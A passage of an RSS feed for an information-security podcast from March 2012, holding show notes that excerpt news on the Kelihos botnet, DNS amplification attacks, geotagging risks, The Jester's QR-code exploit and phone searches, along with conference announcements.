<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, use of these tools on a live system may have an impact of their own on that system. If possible it might be best to first try to capture both system and memory images if possible to preserve volatile system state information. That said, if the threat is significant enough and risk of critical data loss high, then it might be wise to isolate the system from the network immediately if your response protocol allows. Detailed documentation of response actions and tools run will also help in the post-mortem.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.v3.co.uk/v3-uk/news/2158406/stricken-kelihos-botnet-rises-dead"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.v3.co.uk/v3-uk/news/2158406/stricken-kelihos-botnet-rises-dead</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Kelihos botnet that Microsoft claimed to have taken down last year has re-emerged with a bag of new tricks aimed at rebuilding at infecting computers, according to security researchers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They have warned that the resurgent Kelihos botnet is being used to steal credentials, install malware and distribute millions of German stock-related spam messages.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Swiss researchers at the Abuse.ch blog, the new version of Kelihos is using a .eu domain in combination with so-called fast flux techniques.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fast flux is a DNS technique used by botnet operators to mask malware hosting websites behind an constantly-changing network of compromised machines, which act as proxies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Previously Kelihos had used domains associated with the Czech Republic.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security firm GFI has also warned that a new variant of Kelihos is on the loose, with those behind it seemingly intent on rebuilding the botnet.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Despite the best efforts of Microsoft and a number of security specialists, the Kelihos Botnet has continued to gain momentum in the wild,&rdquo; GFI warned.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft said it had shut down the Kelihos botnet last September.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At the time, it said: &ldquo;When Microsoft takes a botnet down, we intend to keep it down.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://securityaffairs.co/wordpress/3184/cyber-crime/anonymous-dns-amplification-attacks-for-operation-global-blackout.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://securityaffairs.co/wordpress/3184/cyber-crime/anonymous-dns-amplification-attacks-for-operation-global-blackout.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In this first couple of months of 2012 we have assisted to an escalation of cyber attacks made by &nbsp;groups of hacktivist, first Anonymous, that have hit main institutions and agencies all over the world. The modus operandi of the group is now well known, attacks that have crippled many victims were mainly of DDoS type, in this way the group has made many web sites inaccessible.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Despite the large number of operations carried out successfully, from the attack to FBI to the one against the CIA, up to now have been warded off attacks capable of making inaccessible the whole Internet. For a long time now, in Internet has persistently circulated the news of a possible attack on a global scale which has as its goal to bring down the entire Internet&rsquo;s Domain Name System (DNS) called a &ldquo;troll&rdquo; by members of Anonymous.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many experts believe the group is working for some time to a new generation of cyber weapon to use in future operations. Until today much of the success of the operation made by the group is related to two main factors, the surprise effect and the critical mass of supporters engaged in the actions. This means that in addition to conventional tools for DDoS (eg LOIC) it&rsquo;s normal to expect the genesis of new methods of attack.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A highly efficient method is known as DNS Amplification Attacks, although known for years could be extremely damaging to the current structure of internet, let&rsquo;s examine it in detail.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The DNS system has a hierarchical structure, at the top there are the &ldquo;root&rdquo; nameservers containing information on where to find the nameservers responsible for the next level down in the hierarchy, the nameservers for things like &ldquo;.com&rdquo; and &ldquo;.org&rdquo; and &ldquo;.uk.&rdquo; In turn, those nameservers contain information about the next level of the hierarchy and so on.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imagine that we are interested to resolve the name securityaffairs.co so a client send the request to the DNS server. The root server will provide info regarding the &ldquo;.co&rdquo; and info regarding the next level in the structure &ldquo;securityaffairs&rdquo; domain. The &ldquo;securityaffairs&rdquo; nameserver is then able to provide the actual binding from the logical name and related IP address. Resuming a recursive process is used to follow the chain of delegations, starting at the Root zone, and ending up at the domain name requested by the client. A recursive name server may need to contact multiple authoritative name servers to resolve given name (e.g. www.net.compsci.googleplex.edu).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Let&rsquo;s image the availability of a Botnet that send spoofed address queries to an Open Resolver causing it to send responses to the spoofed-address target. In this way the Resolver became the the cyber gun against the victims, for which we have spoofed the address, parteciping in an attack on it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This way to operate of DNS ROOT server is called &ldquo;recursive mode&rdquo;, a client send the request to the DNS server for the entire name then leaves it to perform all the necessary requests (either recursive or iterative) on its behalf.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is also another mode to resolve a logical name called &ldquo;</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">interactive mode</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;, in this case the resolver first queries the root nameservers for the top-level domain&rsquo;s nameservers, then queries the top-level domain&rsquo;s nameservers for the second level domain&rsquo;s nameservers, and so on and so forth. The resolver contacts the different nameservers directly to make the complete translation.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-617-foursquare-badge-ir-toolsets-kelihos-and-dns-amplification-attacks/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3628/0/infosec-daily-podcast-episode-617.mp3" length="19294963" type="audio/mpeg" />
		<itunes:duration>0:40:09</itunes:duration>
		<itunes:subtitle>Episode 617 -&#160;FourSquare Badge, IR Toolsets, Kelihos and DNS Amplification Attacks
InfoSec Daily Podcast Episode 617 for March 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.
[...]</itunes:subtitle>
		<itunes:summary>Episode 617 -&#160;FourSquare Badge, IR Toolsets, Kelihos and DNS Amplification Attacks
InfoSec Daily Podcast Episode 617 for March 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, and Karthik Rangarajan.
	
&#160;
Announcements:
How to Rob a Bank in 30 Days or less
When: March 14th 2012
Where: http://securityzone.co/webinar-en.html
Sign up for the webinar that will probably get b0n3z on that watchlist
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
InfoSec Southwest
When: March 30-April 1
Where: Austin, TX
http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
When: Saturday, April 28th-29th, 2012
Where: Bellingham Technical College &#8211; Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!
&#160;
AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
&#160;
LayerOne 2012
When: May 26-27, 2012
Where: Clarion Hotel &#8211; Anaheim, CA
http://www.layerone.org
CFP now open!
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
When: July 21 &#8211; 22, 2012
When: July 23 &#8211; 24, 2012
Where: Black Hat Vegas
http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
Defcon 20
When: July 26-29, 2012
Where: Rio Hotel and Casino &#8211; Las Vegas, NV
http://defcon.org/
CFP &#38; Room reservations now open!
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
When: &#160;September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: http://www.army.mil/article/75165/Geotagging_poses_security_risks/
&#34;Is a badge on Foursquare worth your life?&#34;
The question was posed by Brittany Brown, social media manager of the Online and Social Media Division at the Office of the Chief of Public Affairs. It may sound outlandish, but in the age of social geotagging, it can be a reality.
&#160;
There are a number of location-based social media applications and platforms, including Foursquare, Gowalla, SCVNGR, Shopkick, Loopt and Whrrl, currently on the market. They use GPS features, typically in the user&#39;s phone, to publish the person&#39;s location and offer rewards in the form of discounts, badges or points to encourage frequent check-ins.
&#160;
Security risks for the military:
&#160;
A deployed service member&#39;s situational awareness includes the world of social media. If a Soldier uploads a photo taken on his or her smartphone to Facebook, they could broadcast the exact location of their unit, said Steve Warren, deputy G2 for the Maneuver Center of Excellence, or MCoE.
&#160;
&#34;Today, in pretty much every single smartphone, there is built-in GPS,&#34; Warren said. &#34;For every picture you take with that phone, it will automatically embed the latitude and longitude within the photograph.&#34;
Someone with the right software and the wrong motivation could download the photo and extract the coordinates from the metadata.
Warren cited a real-world example from 2007. When a new fleet of helicopters arrived with an aviation unit at a base in Iraq, some Soldiers took pictures on the flightline, he said. From the photos that were uploaded to the Internet, the enem[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 616 &#8211; Weekend Wrap-up with Dr. b0n3z</title>
		<link>http://www.isdpodcast.com/episode-616-weekend-wrap-up-with-dr-b0n3z</link>
		<comments>http://www.isdpodcast.com/episode-616-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 11 Mar 2012 02:48:47 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3622</guid>
		<description><![CDATA[Episode 616 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 616 for March 10, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Themson Mester. Guests: aricon, connection and spridel and and oncee &#160; Announcements: How to Rob a Bank in 30 Days or less When: March 14th 2012 Where: http://securityzone.co/webinar-en.html Sign up [...]]]></description>
			<content:encoded><![CDATA[<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Episode 616 &#8211; Weekend Wrap-up with Dr. b0n3z</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Daily Podcast Episode 616 for March 10, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez and Themson Mester.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Guests: aricon, connection and spridel and and oncee</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;vertical-align: baseline">Announcements:</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">How to Rob a Bank in 30 Days or less</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 14th 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: </span><a href="http://securityzone.co/webinar-en.html"><span>http://securityzone.co/webinar-en.html</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Sign up for the webinar that will probably get b0n3z on that watchlist</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Social Engineering Training</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21-24, 2012<br class="kix-line-break" /></p>
<p>	Where: Black Hat Vegas</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: August 20-24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /></p>
<p>	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">InfoSec Southwest</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: March 30-April 1</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Linuxfest Northwest 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">AIDE 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 21-25, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: MU Forensic Science Center</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">LayerOne 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: May 26-27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP now open!</span></b></p>
<p>&nbsp;</p>
<h5><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></b></h5>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span> </span><span>http://www.sans.org/mentor/details.php?nid=28014</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span>http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Defcon 20</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: July 26-29, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span>http://defcon.org/</span></a><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">CFP &amp; Room reservations now open!</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span style="font-size: 15px;font-family: Arial;text-decoration: underline;vertical-align: baseline">Stories</span></b></p>
<p><b><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source:</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline"> </span><a href="http://www.infosecisland.com/blogview/20648-The-Jesters-QR-Code-Pwns-Targets-with-WebKit-Exploit.html"><span>http://www.infosecisland.com/blogview/20648-The-Jesters-QR-Code-Pwns-Targets-with-WebKit-Exploit.html</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">Anti-jihadi hacker and Anonymous/AntiSec/LulzSec nemesis The Jester (th3j35t3r) claims to have pulled a fast one on some undesirables, taking advantage of the target&#039;s curious nature and a known smartphone exploit.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;font-style: italic;vertical-align: baseline">&quot;It was a highly targeted and precise attack, against known bad guys, randoms were left totally unscathed,&quot; </span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The Jester blogged.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">The operation was intended to snare unsuspecting targets The Jester had previously identified and aggregated in a database, while supposedly leaving non-targets unscathed.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;font-style: italic;vertical-align: baseline">&quot;At the beginning of this week just hours before the news of </span><a href="https://th3j35t3r.wordpress.com/2011/11/19/if-i-am-wrong-ill-say-im-wrong-heres-my-apology/"><span>Hector Monsegur&rsquo;s</span></a><span style="font-size: 15px;font-family: Arial;font-weight: normal;font-style: italic;vertical-align: baseline"> arrest broke, many of you will have noticed that my </span><a href="http://www.twitter.com/th3j35t3r"><span>twitter profile</span></a><span style="font-size: 15px;font-family: Arial;font-weight: normal;font-style: italic;vertical-align: baseline"> pic changed from the usual &lsquo;Jester Mask&rsquo; to a QR-Code. The timing of this subtle change could not have been more favorable,&quot;</span><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline"> Jester wrote.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://www.techdirt.com/blog/wireless/articles/20120308/03410718033/court-confirms-that-police-dont-need-warrant-to-do-limited-search-mobile-phone.shtml"><span>http://www.techdirt.com/blog/wireless/articles/20120308/03410718033/court-confirms-that-police-dont-need-warrant-to-do-limited-search-mobile-phone.shtml</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;font-weight: normal;vertical-align: baseline">In a court ruling that came out a little while ago (just catching up now), Judge Richard Posner took the lead in an appeals court ruling that effectively reaffirmed the idea that police don&#039;t need a warrant to search mobile phones as they&#039;re arresting someone. Of course, this general concept is not new and I&#039;ve discussed my concerns about police being able to search phones without a warrant in the past &#8212; but this particular ruling does seem pretty limited. While Posner notes some of the bigger questions, he basically compares the phone to a diary, and focuses on the mere searching of basic data, like the address book, to suggest this particular search was limited, and doesn&#039;t raise any significant 4th amendment issue.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&#8230;</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://torrentfreak.com/police-plans-to-raid-the-pirate-bay-120309/"><span>http://torrentfreak.com/police-plans-to-raid-the-pirate-bay-120309/</span></a></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">More than half a decade after Swedish police officers first raided The Pirate Bay, there is talk that a second police raid against the world&rsquo;s most famous torrent site is in the planning. The Pirate Bay team has learned that local authorities have acquired warrants to take action against the site, and expect that both servers and the new .se domain name may be targeted soon.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">Today, the Pirate Bay team has informed TorrentFreak that a second raid is being prepared by the Swedish authorities. The site&rsquo;s operators, who are well-connected in multiple ways, learned that a team of Swedish investigators is gearing up to move against the site in the future.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">The suspicions were also made public by The Pirate Bay a few minutes ago.</span></b></p>
<p><b><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&ldquo;The Swedish district attorney Fredrik Ingblad initiated a new investigation into The Pirate Bay back in 2010. Information has been leaked to us every now and then by multiple sources, almost on a regular basis. It&rsquo;s an interesting read,&rdquo; the Pirate Bay crew </span><a href="http://thepiratebay.se/blog/209"><span>notes</span></a><span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">.</span><br />
	<span style="font-size: 15px;font-family: Arial;background-color: transparent;font-weight: normal;vertical-align: baseline">&hellip;<br class="kix-line-break" /></p>
<p>	</span><span style="font-size: 15px;font-family: Arial;background-color: transparent;vertical-align: baseline">Source: </span><a href="http://news.softpedia.com/news/Duqu-Framework-Coded-in-Unknown-Programming-Language-257343.shtml"><span>http://news.softpedia.com/news/Duqu-Framework-Coded-in-Unknown-Programming-Language-257343.shtml</span></a></b></p>
<p>&nbsp;</p>
